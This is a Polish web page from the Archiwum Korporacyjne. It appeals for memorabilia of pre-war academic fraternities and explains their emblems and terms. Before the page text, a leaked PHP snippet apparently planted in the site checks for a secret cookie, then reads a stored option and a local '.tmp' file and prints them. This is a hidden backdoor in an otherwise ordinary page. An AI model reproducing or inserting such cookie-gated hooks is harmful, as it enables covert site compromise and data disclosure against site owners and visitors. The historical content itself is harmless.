if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Poszukiwania

Od momentu powstania najważniejszą aktywnością Archiwum Korporacyjnego jest gromadzenie wiadomości i pamiątek po przedwojennych korporacjach oraz ich członkach.

W ciągu ostatnich 80 lat większość materialnych śladów po przedwojennych korporacjach uległa bezpowrotnie zniszczeniu. Aby uchronić jednak możliwie wiele z tego, co ocalało, gromadzimy wszelkie, w tym najdrobniejsze świadectwa działalności korporacji. W szczególności poszukujemy:

  1. wiadomości biograficznych i fotografii członków korporacji,
  2. insygniów (czapek, szarf, odznak, pieczęci, rapirów, herbów, sztandarów itp.),
  3. dokumentów (korespondencji, dyplomów, legitymacji, kronik, pamiętników, fotografii itp.),
  4. wydawnictw (ksiąg pamiątkowych, statutów, czasopism, jednodniówek, pocztówek, zaproszeń itp.),
  5. wszelkich innych przedmiotów z symboliką korporacyjną (książek z dedykacjami, papierośnic, dewizek do zegarka i sygnetów korporacyjnych itp.),
  6. pisanych, nagranych lub w inny sposób zarejestrowanych (film, kaseta, płyta, nośniki elektroniczne itp.) wspomnień i relacji dotyczących historii i zwyczajów korporacyjnych, a w szczególności śpiewów,
  7. kontaktów do rodzin zmarłych członków korporacji.

 

Czapka Aesculapii (Poznań) oraz karykatura członka Sparta (Warszawa).

Przy tej okazji warto wskazać na kilka charakterystycznych cech dla prawie wszystkich pamiątek związanych z korporacjami akademickimi.

Po pierwsze, występowanie cyrkla korporacyjnego tj. monogramu złożonego ze stylizowanych liter: V, C i F (od pierwszych liter łacińskiego zawołania “Vivat, Crescat, Floreat” tzn. “Niech żyje, wzrasta i rozkwita”) oraz pierwszej litery nazwy danej korporacji (np. w cyrklu korporacji Lechia jest to litera L) zakończonych wykrzyknikiem.

 

Cyrkiel Lechii (Poznań).

Po drugie, trójbarwność widoczna przede wszystkim na insygniach korporacyjnych (czapkach, szarfach, dewizkach itp.), ale także w postaci pasków, ornamentów i innych znaków na wydawnictwach oraz drukach.

 

Dewizka do zegarka Hermesii (Poznań).
Herb Obotritii (Lwów).
Banda Magna-Polonii zakończona metalową sprzączką z wygrawerowanym cyrklem (Poznań).

Po trzecie, charakterystyczne terminy oraz skróty takie jak np.: konwent (inaczej korporacja) – skrót „K!”, filister – skrót „F!”, comiliton – skrót „C!”, fuks – skrót „f!” (nazwy oznaczające różne rodzaje członkostwa w korporacji), komers, fidułka, coetus (określenia różnych rodzajów spotkań korporacyjnych) - odnośnie terminologii korporacyjnej szerzej vide Muzeum Korporacyjne.

Za wszelką pomoc w poszukiwaniach materialnych śladów po korporacjach akademickich i ich członkach będziemy zobowiązani (vide Kontakt).

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2007 r.
Ostatnia zmiana: 29 XI 2010 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }